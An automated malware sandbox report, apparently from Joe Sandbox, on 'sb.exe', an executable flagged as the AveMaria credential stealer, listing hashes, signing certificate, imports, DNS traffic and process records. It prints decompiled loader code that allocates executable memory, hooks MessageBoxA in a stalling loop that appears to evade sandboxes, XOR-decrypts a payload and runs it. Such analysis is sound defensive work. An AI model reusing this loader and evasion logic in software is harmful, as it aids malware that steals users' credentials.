Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.82.209.183, 20.54.110.249, 40.112.88.60, 173.222.108.226, 173.222.108.210, 20.199.120.151, 20.199.120.85, 80.67.82.211, 80.67.82.235, 20.82.209.104, 23.211.4.86, 23.203.67.116 Excluded domains from analysis (whitelisted): a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, cdn.onenote.net.edgekey.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	3.7813426384094133
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	sb.exe
File size:	1627136
MD5:	e310cb3185d95e3dda42f0230b569d84
SHA1:	c20c8aa953f7df7e9b117258a0d31530e23ffc55
SHA256:	82867648313483db4a6115e0cc2b34c06719ffdb6667e50e625e2dc130adfbca
SHA512:	a0c4a70bc09ea2eb36a1a27af65891d866beec07a1c21208e0b05e549d3d2f7619bef9012dab9e121e53a6a1a56d642bfb5435520292dd879e30f4db71789bbd
SSDEEP:	12288:EjTG/NEiKx8FAuRg7Q7X/CRLL6/mkIHTydNNAF4B0laLpfqFR:EiAuRg7SFWIyFR
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................a...............................................r...T.......T.+.....T.......Rich............PE..L..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40eb3e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6147C4FD [Sun Sep 19 23:17:17 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	9d3536f958f133fe568939841471fa60

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	9/7/2021 5:00:00 PM 9/8/2022 4:59:59 PM
Subject Chain	CN=SAN MARINO INVESTMENTS PTY LTD, O=SAN MARINO INVESTMENTS PTY LTD, S=Victoria, C=AU
Version:	3
Thumbprint MD5:	5F47B0139E6B49D14882A7ABD4026C5A
Thumbprint SHA-1:	D877BC4EA5A61864AA45BCB3F7EBDCD8ACBC5D5D
Thumbprint SHA-256:	72A2371C9873A8CF56E98A6EACB267DEC076593AC0A6917DC10B479F19B9EA6F
Serial:	00D79739187C585E453C00AFC11D77B523

Entrypoint Preview

Instruction
call 00007F8CE8A092C1h
jmp 00007F8CE8A08C1Eh
ret
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
pop ebp
ret
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
pop ebp
ret
mov ecx, dword ptr [0044E638h]
xor eax, eax
cmp ecx, 0040EB48h
setne al
ret
int3
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007F8CE8A093AFh
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 07h
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007F8CE8A09399h
push ebp
mov ebp, esp
sub esp, 00000324h
push ebx
push 00000017h
call 00007F8CE8A062A0h
test eax, eax
je 00007F8CE8A08DF7h
mov ecx, dword ptr [ebp+08h]
int 29h
push 00000003h
call 00007F8CE8A08FBAh
mov dword ptr [esp], 000002CCh
lea eax, dword ptr [ebp-00000324h]
push 00000000h
push eax
call 00007F8CE8A0C023h
add esp, 0Ch
mov dword ptr [ebp-00000274h], eax
mov dword ptr [ebp-00000278h], ecx
mov dword ptr [ebp-0000027Ch], edx
mov dword ptr [ebp-00000280h], ebx
mov dword ptr [ebp-00000284h], esi
mov dword ptr [ebp-00000288h], edi
mov word ptr [ebp-0000025Ch], ss
mov word ptr [ebp+00FFFD98h], cs

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5c4a4	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18b000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x18ae00	0x2600
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x18c000	0x3914	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x58730	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x58828	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x58788	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4e000	0x638	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4c3fa	0x4c400	False	0.454738729508	data	6.61929420007	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x4e000	0x107c4	0x10800	False	0.418604995265	data	5.4012865504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5f000	0x12b554	0x12a200	False	0.175606001048	data	2.35283899818	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x18b000	0x1e0	0x200	False	0.53125	data	4.71229819329	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x18c000	0x3914	0x3a00	False	0.747306034483	data	6.62483061725	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x18b060	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	GetProcessHeaps, GetProcessId, GetProcessTimes, GetQueuedCompletionStatus, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemDefaultLCID, GetSystemDirectoryW, GetSystemInfo, GetSystemTimeAsFileTime, GetTempPathW, GetThreadContext, GetThreadId, GetThreadLocale, GetThreadPriority, GetTickCount, GetTimeFormatW, GetTimeZoneInformation, GetUserDefaultLCID, GetUserDefaultLangID, GetUserDefaultLocaleName, GetVersion, GetVersionExW, GetWindowsDirectoryW, HeapAlloc, HeapCreate, HeapDestroy, HeapFree, HeapReAlloc, HeapSetInformation, HeapSize, InitOnceExecuteOnce, InitializeCriticalSection, InitializeCriticalSectionAndSpinCount, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, IsWow64Process, K32GetPerformanceInfo, K32GetProcessMemoryInfo, K32QueryWorkingSetEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExA, LoadLibraryExW, LoadLibraryW, LocalFree, LockFileEx, MapViewOfFile, MoveFileW, MultiByteToWideChar, OpenProcess, OutputDebugStringA, OutputDebugStringW, PeekNamedPipe, PostQueuedCompletionStatus, ProcessIdToSessionId, QueryDosDeviceW, QueryPerformanceCounter, QueryPerformanceFrequency, QueryThreadCycleTime, RaiseException, ReadConsoleW, ReadFile, ReadProcessMemory, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, RemoveDirectoryW, ReplaceFileW, ResetEvent, ResumeThread, GetEnvironmentStringsW, RtlCaptureStackBackTrace, RtlUnwind, SearchPathW, SetConsoleCtrlHandler, SetCurrentDirectoryW, SetEndOfFile, SetEnvironmentVariableW, SetEvent, SetFileAttributesW, SetFilePointerEx, SetHandleInformation, SetInformationJobObject, SetLastError, SetNamedPipeHandleState, SetProcessShutdownParameters, SetStdHandle, SetThreadPriority, SetUnhandledExceptionFilter, SignalObjectAndWait, Sleep, SleepConditionVariableSRW, SleepEx, SuspendThread, SwitchToThread, GetProcessHandleCount, TerminateJobObject, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TransactNamedPipe, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, UnlockFileEx, UnmapViewOfFile, UnregisterWaitEx, VirtualAlloc, VirtualAllocEx, VirtualFree, VirtualFreeEx, VirtualProtect, VirtualProtectEx, VirtualQuery, VirtualQueryEx, WaitForSingleObject, WaitForSingleObjectEx, WaitNamedPipeW, WakeAllConditionVariable, WideCharToMultiByte, Wow64GetThreadContext, WriteConsoleW, WriteFile, WriteProcessMemory, lstrlenW, GetModuleFileNameA, SizeofResource, SetThreadLocale, InitializeCriticalSectionEx, FindResourceA, lstrlenA, GlobalAlloc, FreeConsole, IsDBCSLeadByte, LoadResource, DecodePointer, GlobalLock, lstrcmpiA, GlobalUnlock, MulDiv, InterlockedFlushSList, FlushInstructionCache, InterlockedPushEntrySList, InterlockedPopEntrySList, GetProcessHeap, GetProcAddress, GetDriveTypeW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetConsoleMode, GetConsoleCP, GetComputerNameExW, GetCommandLineW, GetCommandLineA, GetCPInfo, GetACP, FreeLibrary, FreeEnvironmentStringsW, FormatMessageA, FlushViewOfFile, FlushFileBuffers, FindNextFileW, FindFirstFileExW, FindClose, FileTimeToSystemTime, ExpandEnvironmentStringsW, ExitProcess, EnumSystemLocalesW, EnumSystemLocalesEx, EnterCriticalSection, EncodePointer, DuplicateHandle, DisconnectNamedPipe, DeleteFileW, DeleteCriticalSection, DebugBreak, CreateThread, CreateSemaphoreW, CreateRemoteThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateJobObjectW, CreateIoCompletionPort, CreateFileW, CreateFileMappingW, CreateEventW, CreateDirectoryW, ConnectNamedPipe, CompareStringW, CloseHandle, AssignProcessToJobObject, GetOEMCP, GetNativeSystemInfo, GetModuleHandleW, GetModuleHandleExW, GetModuleHandleA, GetModuleFileNameW, GetLongPathNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileType, GetFileSizeEx, GetFileInformationByHandleEx, GetFileInformationByHandle, GetFileAttributesW, SystemTimeToTzSpecificLocalTime, GetExitCodeProcess, RtlCaptureContext, AcquireSRWLockExclusive
USER32.dll	RegisterClassExA, InvalidateRect, ReleaseDC, BeginPaint, EndPaint, UnregisterClassW, TranslateMessage, SetProcessWindowStation, SetProcessDPIAware, SendMessageTimeoutW, RegisterClassW, PostMessageW, IsWindow, GetWindowThreadProcessId, GetUserObjectInformationW, GetThreadDesktop, PtInRect, GetMessageW, FindWindowExW, DispatchMessageW, DestroyWindow, DefWindowProcW, CreateWindowStationW, CreateWindowExW, GetClientRect, CharNextW, SetFocus, GetParent, CharNextA, GetKeyState, GetFocus, AllowSetForegroundWindow, CloseDesktop, CloseWindowStation, CreateDesktopW, GetProcessWindowStation, UnregisterClassA, UnionRect, LoadCursorA, GetDC, SetWindowPos, EqualRect, IntersectRect, CreateWindowExA, DefWindowProcA, MessageBoxA, GetWindowLongA, IsChild, CallWindowProcA, SetWindowLongA, OffsetRect, GetClassInfoExA, ShowWindow, SetWindowRgn
GDI32.dll	CloseMetaFile, SetWindowOrgEx, CreateRectRgnIndirect, SetWindowExtEx, GetDeviceCaps, DeleteDC, CreateMetaFileA, TextOutA, Rectangle, SetViewportOrgEx, RestoreDC, LPtoDP, CreateDCA, SetMapMode, SetTextAlign, DeleteMetaFile, SaveDC
ADVAPI32.dll	ConvertSidToStringSidW, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertStringSidToSidW, CopySid, CreateProcessAsUserW, CreateRestrictedToken, CreateWellKnownSid, DuplicateToken, DuplicateTokenEx, EqualSid, EventRegister, EventUnregister, EventWrite, FreeSid, GetAce, GetKernelObjectSecurity, GetLengthSid, GetNamedSecurityInfoW, GetSecurityDescriptorSacl, GetSecurityInfo, GetSidSubAuthority, GetTokenInformation, ImpersonateLoggedOnUser, ImpersonateNamedPipeClient, InitializeSid, IsValidSid, LookupPrivilegeValueW, MapGenericMask, OpenProcessToken, RegCloseKey, RegCreateKeyExW, RegDeleteValueW, RegDisablePredefinedCache, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RevertToSelf, SetEntriesInAclW, SetKernelObjectSecurity, SetSecurityInfo, SetThreadToken, SetTokenInformation, SystemFunction036, RegEnumKeyExA, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, RegSetValueExA, RegCreateKeyExA, RegDeleteKeyA, RegQueryInfoKeyW, AccessCheck
SHELL32.dll	SHGetKnownFolderPath, SHGetFolderPathW, CommandLineToArgvW
ole32.dll	OleRegGetUserType, OleRegGetMiscStatus, CoTaskMemRealloc, OleRegEnumVerbs, CreateDataAdviseHolder, WriteClassStm, CoTaskMemFree, CreateOleAdviseHolder, CoCreateInstance, StringFromGUID2, CoTaskMemAlloc, ReadClassStm, OleSaveToStream
OLEAUT32.dll	GetErrorInfo, SetErrorInfo, CreateErrorInfo, VariantClear, VariantCopy, UnRegisterTypeLib, LoadRegTypeLib, VariantInit, LoadTypeLib, SysFreeString, RegisterTypeLib, SysStringByteLen, SysAllocStringByteLen, SysAllocString, OleCreatePropertyFrame, DispCallFunc, SysStringLen, VariantChangeType, VarUI4FromStr
SHLWAPI.dll	PathMatchSpecW
USERENV.dll	CreateEnvironmentBlock, DestroyEnvironmentBlock
VERSION.dll	VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
WINMM.dll	timeGetTime

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 11:49:30.395595074 CEST	64021	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:30.430952072 CEST	53	64021	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:53.463736057 CEST	60784	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:53.496028900 CEST	53	60784	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:54.142466068 CEST	51143	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:54.177561045 CEST	53	51143	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:54.918437004 CEST	56009	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:54.954066038 CEST	53	56009	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:54.957982063 CEST	59026	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:54.987188101 CEST	53	59026	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:55.492863894 CEST	49572	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:55.512423992 CEST	53	49572	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:56.018507004 CEST	60823	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:56.060745001 CEST	53	60823	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:56.488229990 CEST	52130	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:56.508285046 CEST	53	52130	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:56.752593994 CEST	55102	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:56.774513006 CEST	53	55102	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:56.821130991 CEST	56236	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:56.840874910 CEST	53	56236	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:56.961891890 CEST	56527	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:57.051326036 CEST	53	56527	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:57.714659929 CEST	49559	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:57.786499977 CEST	53	49559	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:58.701886892 CEST	52650	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:58.721467018 CEST	53	52650	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:59.124200106 CEST	63297	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:59.141499996 CEST	53	63297	8.8.8.8	192.168.2.3
Sep 28, 2021 11:49:59.428098917 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:49:59.447551966 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 28, 2021 11:50:04.014899969 CEST	53615	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:50:04.033655882 CEST	53	53615	8.8.8.8	192.168.2.3
Sep 28, 2021 11:50:06.862585068 CEST	50728	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:50:06.885427952 CEST	53	50728	8.8.8.8	192.168.2.3
Sep 28, 2021 11:50:17.668047905 CEST	53777	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:50:17.688069105 CEST	53	53777	8.8.8.8	192.168.2.3
Sep 28, 2021 11:50:33.446851015 CEST	57106	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:50:33.466629028 CEST	53	57106	8.8.8.8	192.168.2.3
Sep 28, 2021 11:50:33.992844105 CEST	60352	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:50:34.028847933 CEST	53	60352	8.8.8.8	192.168.2.3
Sep 28, 2021 11:50:49.282088995 CEST	56773	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:50:49.324666977 CEST	53	56773	8.8.8.8	192.168.2.3
Sep 28, 2021 11:50:57.420393944 CEST	60982	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:50:57.441384077 CEST	53	60982	8.8.8.8	192.168.2.3
Sep 28, 2021 11:51:23.579899073 CEST	58058	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:51:23.598867893 CEST	53	58058	8.8.8.8	192.168.2.3
Sep 28, 2021 11:51:33.562012911 CEST	64367	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:51:33.581454992 CEST	53	64367	8.8.8.8	192.168.2.3
Sep 28, 2021 11:51:58.063532114 CEST	51539	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:51:58.091603041 CEST	53	51539	8.8.8.8	192.168.2.3
Sep 28, 2021 11:52:45.367397070 CEST	55393	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:52:45.387176991 CEST	53	55393	8.8.8.8	192.168.2.3
Sep 28, 2021 11:52:59.463311911 CEST	50585	53	192.168.2.3	8.8.8.8
Sep 28, 2021 11:52:59.484613895 CEST	53	50585	8.8.8.8	192.168.2.3

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: sb.exe PID: 6404 Parent PID: 4560

General

Start time:	11:49:08
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\sb.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\sb.exe'
Imagebase:	0xcb0000
File size:	1627136 bytes
MD5 hash:	E310CB3185D95E3DDA42F0230B569D84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.374727716.00000000027E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.374727716.00000000027E0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: conhost.exe PID: 6408 Parent PID: 6404

General

Start time:	11:49:09
Start date:	28/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: sb.exe PID: 6404 Parent PID: 4560 sb.exeCOMMON

Executed Functions

Function 00CB7E5F, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103
windowmemorysleepCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00CB7E5F() {
				signed int _v8;
				intOrPtr _v12;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				long _v116;
				void* _v120;
				signed int _t30;
				void* _t32;
				signed int _t40;
				void* _t54;
				CHAR* _t55;
				signed int* _t56;
				signed int _t57;
				void* _t58;
				void* _t59;
				void* _t62;
				signed int _t63;
				void* _t65;
				signed int _t66;

				_t30 =  *0xd0f014; // 0xbb5e653b
				_v8 = _t30 ^ _t66;
				asm("movaps xmm0, [0xd08720]");
				asm("movups [ebp-0x68], xmm0");
				_v12 = 0x9d580485;
				asm("movaps xmm0, [0xd086e0]");
				asm("movups [ebp-0x58], xmm0");
				asm("movaps xmm0, [0xd086f0]");
				asm("movups [ebp-0x48], xmm0");
				asm("movaps xmm0, [0xd08710]");
				asm("movups [ebp-0x38], xmm0");
				asm("movaps xmm0, [0xd08700]");
				asm("movups [ebp-0x28], xmm0");
				asm("movaps xmm0, [0xd086d0]");
				asm("movups [ebp-0x18], xmm0"); // executed
				_t32 = VirtualAlloc(0, 0xa00000, 0x3000, 0x40); // executed
				_t65 = MessageBoxA;
				_t62 = _t32;
				_v120 = _t62;
				_v116 = 0;
				VirtualProtect(MessageBoxA, 0x100, 0x40,  &_v116); // executed
				_t59 = 0;
				_v109 =  *MessageBoxA;
				_t56 = 0xe0996c;
				_v110 =  *((intOrPtr*)(1));
				_v111 =  *((intOrPtr*)(2));
				_v112 =  *((intOrPtr*)(3));
				 *MessageBoxA = 0x900010c2;
				do {
					_t40 =  !( *_t56);
					if(_t40 != 0) {
						 *(_t59 + _t62) = _t40;
					}
					_t56 = _t56 - 4;
					_t59 = _t59 + 1;
				} while (_t56 >= 0xd0f970);
				_t54 = 0x927c00;
				do {
					_t63 = 0x400;
					do {
						MessageBoxA(0, "SearchPathW", "SearchPathW", 2);
						_t63 = _t63 - 1;
					} while (_t63 != 0);
					_t54 = _t54 - 1;
				} while (_t54 != 0);
				_t55 = "SearchPathW";
				do {
					MessageBoxA(0, _t55, _t55, 1);
					MessageBoxA(0, _t55, _t55, 0);
					asm("cdq");
					_t57 = 0x64;
					_t58 = _v120;
					 *(_t58 + _t63) =  *(_t58 + _t63) ^  *(_t66 + _t63 % _t57 - 0x68);
					_t63 = _t63 + 1;
				} while (_t63 < 0x3e800);
				 *_t65 = _v109;
				 *((char*)(_t65 + 1)) = _v110;
				 *((char*)(_t65 + 2)) = _v111;
				 *((char*)(_t65 + 3)) = _v112;
				 *_t58();
				L11:
				Sleep(0x7d0); // executed
				goto L11;
			}

0x00cb7e65
0x00cb7e6c
0x00cb7e6f
0x00cb7e77
0x00cb7e7d
0x00cb7e84
0x00cb7e8c
0x00cb7e91
0x00cb7e98
0x00cb7e9e
0x00cb7ea5
0x00cb7eae
0x00cb7eb5
0x00cb7ebe
0x00cb7ec6
0x00cb7eca
0x00cb7ed0
0x00cb7ed6
0x00cb7edb
0x00cb7ee7
0x00cb7eea
0x00cb7ef2
0x00cb7ef4
0x00cb7ef7
0x00cb7eff
0x00cb7f05
0x00cb7f0b
0x00cb7f0e
0x00cb7f14
0x00cb7f16
0x00cb7f1a
0x00cb7f1c
0x00cb7f1c
0x00cb7f1f
0x00cb7f22
0x00cb7f23
0x00cb7f2b
0x00cb7f30
0x00cb7f30
0x00cb7f35
0x00cb7f43
0x00cb7f45
0x00cb7f45
0x00cb7f4a
0x00cb7f4a
0x00cb7f4f
0x00cb7f54
0x00cb7f5a
0x00cb7f62
0x00cb7f68
0x00cb7f69
0x00cb7f6c
0x00cb7f73
0x00cb7f76
0x00cb7f77
0x00cb7f82
0x00cb7f87
0x00cb7f8d
0x00cb7f93
0x00cb7f96
0x00cb7f98
0x00cb7f9d
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,00A00000,00003000,00000040), ref: 00CB7ECA
VirtualProtect.KERNEL32(76967E90,00000100,00000040,?), ref: 00CB7EEA
MessageBoxA.USER32 ref: 00CB7F43
MessageBoxA.USER32 ref: 00CB7F5A
MessageBoxA.USER32 ref: 00CB7F62
Sleep.KERNEL32(000007D0), ref: 00CB7F9D

Strings

SearchPathW, xrefs: 00CB7F37, 00CB7F3C, 00CB7F4F, 00CB7F56, 00CB7F57, 00CB7F5E, 00CB7F5F

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Virtual$AllocProtectSleep
String ID: SearchPathW
API String ID: 521561353-4141590369
Opcode ID: 68a0d636b7835c1ef7aa939962b7a2b232fd0682b03f8baab4b8e8d47b74b323
Instruction ID: 6cac8c22ec67641ca9161e4cb6f2783cf5e1092c813b92ded5b19eba3dfaee07
Opcode Fuzzy Hash: 68a0d636b7835c1ef7aa939962b7a2b232fd0682b03f8baab4b8e8d47b74b323
Instruction Fuzzy Hash: 1E411824E087C85AE7124FB88C41BFDFFB4AF6A304F146259EAC87B3A2D66055C5C761

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3C3D, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CE3C3D(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xe3a39c, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00CE0D22();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00CDC0C4(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00CE0DDE(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00ce3c3d
0x00ce3c43
0x00ce3c48
0x00ce3c56
0x00ce3c56
0x00ce3c5c
0x00ce3c5e
0x00ce3c5e
0x00ce3c75
0x00ce3c7e
0x00ce3c86
0x00000000
0x00000000
0x00ce3c66
0x00ce3c68
0x00ce3c8a
0x00ce3c8f
0x00ce3c95
0x00000000
